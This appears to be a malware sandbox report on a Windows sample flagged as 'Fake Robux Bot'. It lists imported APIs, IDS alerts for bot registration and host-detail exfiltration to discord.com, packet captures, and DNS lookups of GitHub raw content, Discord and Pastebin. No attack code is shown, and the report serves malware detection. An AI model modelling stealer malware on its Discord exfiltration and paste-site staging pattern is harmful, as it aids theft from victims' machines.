                                                                                                KERNEL32.dllVirtualFree, VirtualAlloc, WaitForSingleObject, MultiByteToWideChar, Sleep, GetLastError, CloseHandle, CreateProcessW, CreateFileW, HeapSize, GetProcessHeap, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, WriteConsoleW
                                                                                                USER32.dllMessageBoxW
                                                                                                WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile

                                                                                                Possible Origin

                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States

                                                                                                Network Behavior

                                                                                                Suricata IDS Alerts

                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-10-15T15:54:51.325571+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.362862162.159.138.232443TCP
                                                                                                2024-10-15T15:55:12.953506+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.362871162.159.138.232443TCP
                                                                                                2024-10-15T15:55:18.941754+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.362872162.159.138.232443TCP

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 15, 2024 15:54:10.755897045 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:10.755943060 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:10.756189108 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:10.769877911 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:10.769900084 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.386420965 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.386540890 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.392611980 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.392632961 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.393142939 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.422543049 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.467407942 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.578830004 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.578934908 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.578968048 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.578995943 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.579000950 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.579013109 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.579058886 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.579068899 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.579104900 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.579114914 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.579127073 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.579171896 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.579179049 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.629134893 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.629146099 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.676193953 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.696676016 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.696739912 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.696772099 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.696811914 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.696821928 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.696831942 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.696862936 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.696887016 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.696894884 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.696958065 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.696964979 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.697004080 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.697474957 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.697529078 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.697582960 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.697587013 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.697598934 CEST44349710185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.697808981 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.763662100 CEST49710443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.899399996 CEST49711443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.899440050 CEST44349711185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:11.899542093 CEST49711443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.914971113 CEST49711443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:11.914994001 CEST44349711185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:12.521678925 CEST44349711185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:12.521811962 CEST49711443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:12.579410076 CEST49711443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:12.579428911 CEST44349711185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:12.579684019 CEST44349711185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:12.579746008 CEST49711443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:12.581828117 CEST49711443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:12.627404928 CEST44349711185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:12.858213902 CEST44349711185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:12.858311892 CEST44349711185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:12.858340025 CEST49711443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:12.858409882 CEST49711443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:12.863254070 CEST49711443192.168.2.3185.199.111.133
                                                                                                Oct 15, 2024 15:54:12.863272905 CEST44349711185.199.111.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:50.459806919 CEST62862443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:54:50.459841967 CEST44362862162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:54:50.459918976 CEST62862443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:54:50.460813999 CEST62862443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:54:50.460839033 CEST44362862162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:54:51.081769943 CEST44362862162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:54:51.081857920 CEST62862443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:54:51.085706949 CEST62862443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:54:51.085722923 CEST44362862162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:54:51.085999012 CEST44362862162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:54:51.088057995 CEST62862443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:54:51.135405064 CEST44362862162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:54:51.135951996 CEST62862443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:54:51.135958910 CEST44362862162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:54:51.325568914 CEST44362862162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:54:51.325649023 CEST44362862162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:54:51.325704098 CEST62862443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:54:51.337537050 CEST62862443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:54:54.738395929 CEST6286380192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:54.743406057 CEST8062863104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:54.743626118 CEST6286380192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:54.745069981 CEST6286380192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:54.750014067 CEST8062863104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.356730938 CEST8062863104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.359507084 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:55.359535933 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.359630108 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:55.366707087 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:55.366723061 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.473124027 CEST6286380192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:55.983211040 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.983891964 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:55.985531092 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:55.985553980 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.985835075 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.992289066 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:56.039407969 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.141788960 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.141894102 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.141994953 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:56.194992065 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:56.250463009 CEST6286580192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.255404949 CEST8062865185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.255789042 CEST6286580192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.256139994 CEST6286580192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.261173964 CEST8062865185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.860342026 CEST8062865185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.860641003 CEST6286580192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.861955881 CEST8062865185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.862060070 CEST6286580192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.864386082 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.864451885 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.865583897 CEST8062865185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.865679979 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.865959883 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.865986109 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.844743013 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.844849110 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:57.870608091 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:57.870625019 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.871026039 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.871926069 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:57.915401936 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995038986 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995140076 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995170116 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995194912 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:57.995209932 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995277882 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:57.995286942 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995656967 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995723963 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:57.995731115 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:58.003468037 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:58.003550053 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:58.045392990 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:01.585823059 CEST6286780192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:01.590903044 CEST8062867104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:01.594052076 CEST6286780192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:01.595312119 CEST6286780192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:01.600431919 CEST8062867104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:02.453439951 CEST8062867104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:02.453788996 CEST8062867104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:02.453869104 CEST6286780192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:02.569444895 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:02.569490910 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:02.569597960 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:02.583997011 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:02.584019899 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.209709883 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.209873915 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:03.211920023 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:03.211925030 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.212311983 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.228061914 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:03.271414042 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.372608900 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.372731924 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.374181032 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:03.429285049 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:03.462133884 CEST6286980192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:03.467190981 CEST8062869185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.467953920 CEST6286980192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:03.468152046 CEST6286980192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:03.473033905 CEST8062869185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.058543921 CEST8062869185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.058821917 CEST6286980192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.059164047 CEST8062869185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.059225082 CEST6286980192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.059773922 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.059813023 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.059896946 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.060183048 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.060199976 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.063721895 CEST8062869185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.991636038 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.991812944 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.993451118 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.993467093 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.993839979 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.994815111 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:05.035403967 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.345571995 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.345628977 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.345654964 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.345675945 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.345741987 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:05.345768929 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.345782042 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:05.346178055 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.346224070 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:05.346234083 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.351982117 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.352060080 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:05.392771959 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:11.939635992 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:11.939694881 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:11.939776897 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:11.946779966 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:11.946794987 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.557713985 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.557790995 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:12.563751936 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:12.563771009 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.564038992 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.564925909 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:12.607394934 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.607459068 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:12.607465982 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.953572989 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.953859091 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.953939915 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:12.977652073 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.061791897 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.061836958 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.061944008 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.062438965 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.062460899 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.081305027 CEST6286380192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:18.682425022 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.682554960 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.683880091 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.683886051 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.684127092 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.685029030 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.727396011 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.727466106 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.727471113 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.941766977 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.941833973 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.941904068 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.947873116 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:24.060116053 CEST6286780192.168.2.3104.20.3.235

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 15, 2024 15:54:10.735569954 CEST6291353192.168.2.31.1.1.1
                                                                                                Oct 15, 2024 15:54:10.746560097 CEST53629131.1.1.1192.168.2.3
                                                                                                Oct 15, 2024 15:54:37.230989933 CEST5360798162.159.36.2192.168.2.3
                                                                                                Oct 15, 2024 15:54:37.860766888 CEST5098253192.168.2.31.1.1.1
                                                                                                Oct 15, 2024 15:54:37.868402958 CEST53509821.1.1.1192.168.2.3
                                                                                                Oct 15, 2024 15:54:50.451730967 CEST5942053192.168.2.31.1.1.1
                                                                                                Oct 15, 2024 15:54:50.458738089 CEST53594201.1.1.1192.168.2.3
                                                                                                Oct 15, 2024 15:54:54.718632936 CEST4988653192.168.2.31.1.1.1
                                                                                                Oct 15, 2024 15:54:54.726151943 CEST53498861.1.1.1192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.240118027 CEST6264853192.168.2.31.1.1.1
                                                                                                Oct 15, 2024 15:54:56.247569084 CEST53626481.1.1.1192.168.2.3

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Oct 15, 2024 15:54:10.735569954 CEST192.168.2.31.1.1.10x7884Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:37.860766888 CEST192.168.2.31.1.1.10xf2f1Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:50.451730967 CEST192.168.2.31.1.1.10xd6a8Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:54.718632936 CEST192.168.2.31.1.1.10x85c8Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:56.240118027 CEST192.168.2.31.1.1.10x49d7Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Oct 15, 2024 15:54:10.746560097 CEST1.1.1.1192.168.2.30x7884No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:10.746560097 CEST1.1.1.1192.168.2.30x7884No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:10.746560097 CEST1.1.1.1192.168.2.30x7884No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:10.746560097 CEST1.1.1.1192.168.2.30x7884No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:37.868402958 CEST1.1.1.1192.168.2.30xf2f1Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:50.458738089 CEST1.1.1.1192.168.2.30xd6a8No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:50.458738089 CEST1.1.1.1192.168.2.30xd6a8No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:50.458738089 CEST1.1.1.1192.168.2.30xd6a8No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:50.458738089 CEST1.1.1.1192.168.2.30xd6a8No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:50.458738089 CEST1.1.1.1192.168.2.30xd6a8No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:54.726151943 CEST1.1.1.1192.168.2.30x85c8No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:54.726151943 CEST1.1.1.1192.168.2.30x85c8No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:54.726151943 CEST1.1.1.1192.168.2.30x85c8No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:56.247569084 CEST1.1.1.1192.168.2.30x49d7No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:56.247569084 CEST1.1.1.1192.168.2.30x49d7No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:56.247569084 CEST1.1.1.1192.168.2.30x49d7No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:54:56.247569084 CEST1.1.1.1192.168.2.30x49d7No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • raw.githubusercontent.com
                                                                                                • discord.com
